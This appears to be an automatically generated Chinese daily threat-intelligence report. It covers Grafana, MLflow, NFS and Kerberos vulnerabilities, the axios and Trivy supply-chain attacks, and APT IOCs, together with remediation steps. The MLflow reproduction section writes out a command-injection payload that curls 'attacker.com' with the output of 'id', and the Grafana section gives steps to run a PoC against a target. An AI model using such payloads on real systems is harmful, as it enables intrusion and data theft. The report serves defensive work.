每日安全情报报告 · 2026-04-01
生成时间 :2026-04-01 08:13 UTC+8
情报来源 :NVD、GitHub、The Hacker News、Snyk、F5 Labs、Grafana 官方公告、FreeBuf、技术栈
风险标注:🔴 严重(CVSS ≥ 9.0)|🟠 高危(CVSS 7.0-8.9)|🟡 中危(CVSS 4.0-6.9)|⚠️ 在野利用
一、高危漏洞速览
🔴 CVE-2026-27876 --- Grafana SQL 表达式任意文件写入导致 RCE
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 任意文件写入 → 远程代码执行(RCE) |
| 受影响组件 | Grafana v11.6.0 及以上所有版本(OSS/Enterprise) |
| CVSS 评分 | 9.1(严重) |
| PoC 状态 | 已公开(GitHub PoC 可用) |
| 在野利用 | 暂无确认,积极扫描中 |
| 披露日期 | 2026-03-25 |
漏洞详情 :Grafana 的 sqlExpressions 功能开关在处理 SQL 语法时存在缺陷,允许具有"查看者"或更高权限的攻击者向文件系统写入任意文件。与 Grafana Enterprise 中的 Sqlyze 驱动或 AWS 数据源组件联合利用,可形成完整 RCE 攻击链,最终获取 Grafana 宿主机的 SSH 访问权限。
修复方案 :立即升级至以下已修复版本:
- Grafana 12.4.2 / 12.3.6 / 12.2.8 / 12.1.10 / 11.6.14
临时缓解 :若无法立即升级,禁用 sqlExpressions 功能开关,或同时禁用 Sqlyze 插件和所有 AWS 数据源。
🔗 Grafana 官方安全公告 | NVD 详情 | cvefeed.io 分析
🔴 CVE-2025-15379 --- MLflow 模型工件命令注入(CVSS 10.0)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 命令注入(CWE-77) |
| 受影响组件 | MLflow 3.8.0(模型服务容器初始化代码) |
| CVSS 评分 | 10.0(满分,严重) |
| PoC 状态 | 概念验证已存在(Snyk/GitHub Advisory) |
| 在野利用 | 暂无确认,但 CVSS 满分风险极高 |
| 披露日期 | 2026-03-30 |
漏洞详情 :漏洞位于 MLflow 的 _install_model_dependencies_to_env() 函数中。当使用 env_manager=LOCAL 部署模型时,MLflow 从模型工件的 python_env.yaml 文件中读取依赖项规格并直接插入 Shell 命令,未进行充分净化。攻击者可通过提供恶意模型工件,在部署该模型的服务器上执行任意命令。此漏洞对 MLOps 平台和 AI/ML 供应链构成严重威胁。
修复方案 :升级至 MLflow 3.8.2(已修复版本)。
🔗 GitHub Advisory GHSA-r23q-823p-vmf7 | Snyk 漏洞详情 | NVD 详情
🔴 CVE-2026-21509 --- NFS RCE 预认证无交互漏洞(CVSS 9.8)⚠️ APT28 在野利用
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 远程代码执行(RCE) |
| 受影响组件 | NFS 服务(多家厂商受影响) |
| CVSS 评分 | 9.8(严重) |
| PoC 状态 | 已被 APT28 武器化 |
| 在野利用 | ✅ 确认在野利用(APT28 PRISMEX 行动) |
| 披露日期 | 2026-03-20 |
漏洞详情:CVE-2026-21509 是一个无需认证、无需用户交互的 NFS 服务 RCE 漏洞(CVSS 9.8)。APT28(Fancy Bear / Pawn Storm)组织在其最新的 PRISMEX 模块化恶意软件行动中正在积极利用此漏洞,目标涵盖乌克兰国防供应链及北约盟国后勤系统。结合零日漏洞 CVE-2026-21513,攻击者可实现完整的横向移动和驻留。
修复方案:立即应用厂商补丁;禁用非必要的 NFS 服务;在网络层封堵 NFS 端口(TCP/UDP 2049)。
🔗 purple-ops.io 分析报告 | F5 Labs 威胁公告
🔴 CVE-2026-20833 --- Windows Kerberos RC4 信息泄露(微软 4 月强制更新)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 信息泄露 → Kerberos 弱加密降级 |
| 受影响组件 | Windows Server / Active Directory(Kerberos RC4-HMAC) |
| CVSS 评分 | 🟠 高危(具体分值待补充) |
| PoC 状态 | 技术原理已公开 |
| 在野利用 | 理论可利用,强制修复中 |
| 关键时间 | 2026 年 4 月补丁日(4 月 8 日)起强制第二阶段部署 |
漏洞详情 :微软从 2026 年 1 月起逐步强化 Kerberos 身份验证,弃用 RC4(RC4-HMAC)加密。4 月补丁日(2026-04-08) 起进入第二部署阶段:未迁移至 AES 加密的服务账户将停止正常认证,导致企业内部服务中断。此变更修复 CVE-2026-20833 的服务票据弱加密问题。企业 Active Directory 管理员需在本周内完成 AES 迁移。
行动建议 :运行 Get-ADUser -Filter * -Properties msDS-SupportedEncryptionTypes | Where-Object { $_.msDS-SupportedEncryptionTypes -eq 0 } 识别受影响账户,并立即配置 AES256 加密。
🔗 微软官方支持文档 | 4sysops 详细分析
二、漏洞 PoC 情报
PoC-01:CVE-2026-27876 --- Grafana SQL 表达式 RCE
风险级别 :🔴 严重 | PoC 状态 :已公开
来源 :GitHub --- 0xBlackash/CVE-2026-27876
漏洞原理 :攻击者利用 Grafana 的 sqlExpressions 功能,注入恶意 SQL 表达式,通过 Sqlyze 驱动写入任意文件(覆盖配置或写入 Webshell),最终实现 RCE。
使用步骤(仅供授权安全研究):
bash
# 步骤 1:克隆 PoC 仓库
git clone https://github.com/0xBlackash/CVE-2026-27876.git
cd CVE-2026-27876
# 步骤 2:安装依赖(Python 3.x 环境)
pip install requests
# 步骤 3:运行漏洞检测脚本(非破坏性检测)
python3 CVE-2026-27876-check.py http://target-grafana:3000
# 步骤 4(可选):使用 Nuclei 模板批量检测
nuclei -u http://target-grafana:3000 -t CVE-2026-27876-check.yaml检测/防御要点 :
-
监控 Grafana 日志中含有
sqlExpressions的异常查询 -
检查 Grafana 数据目录中是否存在可疑新增文件
-
立即升级至修复版本(见上方漏洞详情)
🔗 PoC 仓库 | OpenCVE 分析
PoC-02:Axios npm 供应链攻击 --- 跨平台 RAT 投毒(2026-03-31)
风险级别 :🔴 严重 | PoC 状态 :恶意代码已公开分析
来源 :Snyk 技术分析 | phoenix.security 分析
事件概述 :2026-03-31,攻击者劫持 axios 首席维护者的 npm 账户,发布 axios@1.14.1 和 axios@0.30.4 两个恶意版本(发布窗口约 2 小时)。恶意版本注入依赖 plain-crypto-js@4.2.1,通过 postinstall 钩子在安装时自动执行远程访问木马(RAT)。
攻击链技术细节:
npm install axios@1.14.1
└─→ postinstall: node setup.js
└─→ 下载跨平台 RAT(经 Base64+XOR 混淆)
├─ macOS: 伪装为系统守护进程
├─ Windows: 伪装为 Windows Terminal (wt.exe)
└─ Linux: Python 脚本后台运行 (/tmp/ld.py)受感染检测步骤:
bash
# 步骤 1:检查 package-lock.json 是否含恶意版本
grep -E '"axios"' package-lock.json | grep -E '1\.14\.1|0\.30\.4'
# 步骤 2:检测恶意依赖是否存在
npm ls plain-crypto-js
find node_modules -name "plain-crypto-js" -type d
# 步骤 3:检查 IOC 文件(三选一)
# macOS: ls /Library/Caches/com.apple.act.mond
# Windows: ls %PROGRAMDATA%\wt.exe
# Linux: ls /tmp/ld.py
# 步骤 4:检查 C2 网络连接
netstat -an | grep "sfrclak.com"立即处置建议 :
-
若发现使用了恶意版本,立即重建所有相关系统 (不要尝试仅清理)
-
轮换所有在该环境中使用过的凭证(SSH 密钥、API Token、数据库密码等)
-
今后使用
npm install --ignore-scripts减少供应链攻击面
🔗 Snyk 官方分析 | The Hacker News 报道
PoC-03:CVE-2025-15379 --- MLflow 命令注入(CVSS 10.0)
风险级别 :🔴 严重 | PoC 状态 :GitHub Advisory 已公开技术细节
来源 :GitHub Advisory GHSA-r23q-823p-vmf7
漏洞原理 :_install_model_dependencies_to_env() 函数从攻击者控制的 python_env.yaml 中读取依赖并拼接进 Shell 命令,实现任意命令执行。
复现步骤(仅供授权安全研究):
bash
# 步骤 1:准备恶意模型工件
# 在 python_env.yaml 的 dependencies 字段注入命令
cat > python_env.yaml << 'EOF'
python: "3.9"
build_dependencies:
- pip
dependencies:
- "requests; python_version > '0' #$(curl http://attacker.com/$(id))"
EOF
# 步骤 2:克隆包含恶意 yaml 的模型目录
git clone https://github.com/<attacker>/malicious-mlflow-model.git
# 步骤 3:用受害者 MLflow 实例(3.8.0)部署模型
mlflow models serve -m ./malicious-mlflow-model --env-manager local
# 触发时:_install_model_dependencies_to_env() 执行注入的 Shell 命令修复:升级至 MLflow 3.8.2:
bash
pip install --upgrade mlflow==3.8.2🔗 GitHub Advisory 详情 | Snyk 漏洞库 | NVD 详情
三、网络安全最新资讯
📰 01 | Axios npm 供应链攻击:1 亿周下载量的 HTTP 库遭投毒
来源 :The Hacker News / Snyk
发布时间 :2026-03-31 / 2026-04-01
风险级别:🔴 严重
JavaScript 最流行的 HTTP 客户端库 axios(每周 1 亿次下载)在 2026 年 3 月 31 日遭遇供应链攻击。攻击者劫持首席维护者 jasonsaayman 的 npm 账号,篡改账号邮箱和 2FA 设置,发布 axios@1.14.1 和 axios@0.30.4 恶意版本约 2 小时。此次攻击采用双重混淆(反向 Base64 + XOR 密钥加密)的 RAT 载荷,可在 Windows、macOS、Linux 三大平台上建立持久后门。所有在发布窗口期执行 npm install 的 CI/CD 管道和开发者均应视为受感染。
建议 :锁定安全版本(axios@1.14.0 或更早),立即审计所有相关 CI/CD 环境。
🔗 阅读原文 --- The Hacker News | 技术分析 --- Snyk
📰 02 | APT28(Pawn Storm)部署 PRISMEX 恶意软件套件,针对乌克兰及北约目标
来源 :F5 Labs 每周威胁公告
发布时间 :2026-04-01
风险级别:🔴 严重(国家级 APT)
与俄罗斯 GRU 相关联的 APT28 组织(又称 Fancy Bear)自 2025 年 9 月持续开展名为"PRISMEX"的网络间谍行动,近期活动显著升级。攻击者使用模块化恶意软件套件 PRISMEX,通过鱼叉式网络钓鱼邮件投递,利用 CVE-2026-21509(NFS RCE,CVSS 9.8)和疑似零日漏洞 CVE-2026-21513。恶意软件滥用 Filen.io 等合法云服务作为 C2 通道,增加检测难度。主要攻击目标为乌克兰国防供应链及盟军后勤系统。
IOC 特征 :
-
恶意 DLL:
adwapi64.dll -
伪装图像:
SplashScreen.png -
恶意计划任务:
OneDriveHealth -
C2 域名:
wellnesscaremed[.]com,gateway.filen.io
📰 03 | Trivy 供应链投毒持续蔓延:1000+ SaaS 环境 CI/CD 凭证外泄
来源 :SANS NewsBites / Mandiant
发布时间 :2026-03-26
风险级别:🔴 严重
安全扫描工具 Trivy 的 GitHub Actions 构建流程遭到篡改(恶意版本 v0.69.4),Mandiant 调查显示超过 1000 个 SaaS 环境的 CI/CD 凭证已外泄。攻击者将恶意代码植入构建流程,窃取 GitHub Token、AWS 访问密钥、容器注册表凭证等敏感信息。此次攻击与 2026 年 3 月初的 Apifox 供应链事件同期发生,显示针对 DevOps 工具链的攻击浪潮持续升温。
受影响范围:所有使用 Trivy GitHub Actions v0.69.4 的项目。
建议:立即卸载/降级至 v0.69.3 以下;轮换所有 CI/CD 密钥;审计 Actions 日志中的异常行为。
📰 04 | BPFDoor 后门持续威胁电信网络:Red Menshen 组织深度潜伏分析
来源 :F5 Labs 威胁公告
发布时间 :2026-04-01
风险级别:🔴 严重(国家级 APT)
与中国关联的 Red Menshen 组织(又称 Earth Bluecrow)长期利用 BPFDoor Linux 后门针对中东和亚洲电信网络实施间谍活动。BPFDoor 不开放任何监听端口,通过在内核层滥用伯克利数据包过滤器(BPF)监听含特定"魔法字节"的触发数据包来激活后门 Shell,使传统的端口扫描和流量分析完全失效。已有开源 BPFDoor 检测脚本可用于扫查受感染主机。
检测特征 :
-
文件路径:
/dev/shm/kdmtmpflush -
伪装进程名:
/sbin/udevd -d
📰 05 | 微软 4 月 Patch Tuesday 预警:Kerberos RC4 弃用进入强制阶段
来源 :微软官方 / 4sysops
发布时间 :2026-03-28
风险级别:🟠 高危(广泛影响企业 AD 环境)
微软将于 2026 年 4 月 8 日(Patch Tuesday)发布的 Windows 更新中,强制进入 CVE-2026-20833 Kerberos 漏洞修复的第二部署阶段:停止为没有明确配置加密类型的服务账户颁发基于 RC4 的票据。这将导致未及时迁移至 AES 加密的企业 Active Directory 环境出现认证中断。影响包括 Windows Server 2019/2022 及相关服务账户。IT 管理员需在 4 月 8 日前完成审计和 AES 迁移。
🔗 阅读原文 --- 微软支持文档 | 4sysops 迁移指南
📰 06 | Langflow AI 框架代码注入漏洞持续在野利用(CVE-2026-33017)
来源 :CISA / F5 Labs
发布时间 :2026-04-01
风险级别:🔴 严重(CVSS 9.3,已在野利用)
CISA 最新警告,Langflow(开源 AI 代理构建框架)的代码注入漏洞 CVE-2026-33017(CVSS 9.3)持续遭受活跃利用。攻击者可通过特制 HTTP 请求执行任意 Python 代码,无需任何认证。漏洞细节公开约 20 小时后即出现大规模利用。已有多个使用 Langflow 构建 AI 工作流的组织报告入侵事件,攻击者主要目的是窃取 API 密钥和数据库凭证。
建议 :立即升级至 Langflow 1.9.0 及以上;禁止将 Langflow 实例直接暴露于公网;轮换所有相关 API 密钥。
🔗 CISA 安全公告 | F5 Labs 威胁公告 | purple-ops 漏洞报告
四、今日修复优先级建议
| 优先级 | CVE / 事件 | 行动 | 截止时间 |
|---|---|---|---|
| P0 立即 | Axios npm 供应链攻击 | 审计 package-lock.json,轮换 CI/CD 凭证,重建受感染系统 | 立即 |
| P0 立即 | CVE-2025-15379 MLflow | 升级至 3.8.2,审查模型工件来源 | 立即 |
| P0 立即 | CVE-2026-33017 Langflow | 升级至 1.9.0+,轮换凭证 | 立即 |
| P1 本周 | CVE-2026-27876 Grafana | 升级至修复版本,或禁用 sqlExpressions | 48 小时内 |
| P1 本周 | CVE-2026-20833 Kerberos | 完成 AES 迁移,避免 4/8 后认证中断 | 2026-04-07 前 |
| P1 本周 | CVE-2026-21509 NFS RCE | 应用补丁,封堵 NFS 端口 | 72 小时内 |
| P2 两周 | BPFDoor 后门排查 | 运行检测脚本扫查所有 Linux 生产服务器 | 2 周内 |
| P2 两周 | Trivy 供应链投毒 | 降级至 v0.69.3 以下,审计 Actions 日志 | 已发布 3 月初 |
五、情报来源
| 来源 | 链接 |
|---|---|
| NVD 国家漏洞数据库 | nvd.nist.gov |
| CISA 安全公告 | cisa.gov/cybersecurity-advisories |
| The Hacker News | thehackernews.com |
| Grafana 官方安全公告 | grafana.com/security |
| GitHub Security Advisories | github.com/advisories |
| Snyk 漏洞数据库 | security.snyk.io |
| F5 Labs 威胁情报 | f5.com/labs |
| FreeBuf 安全资讯 | freebuf.com |
本报告由自动化安全情报系统于 2026-04-01 08:13 生成。内容仅供安全研究和防御参考,禁止用于非法攻击活动。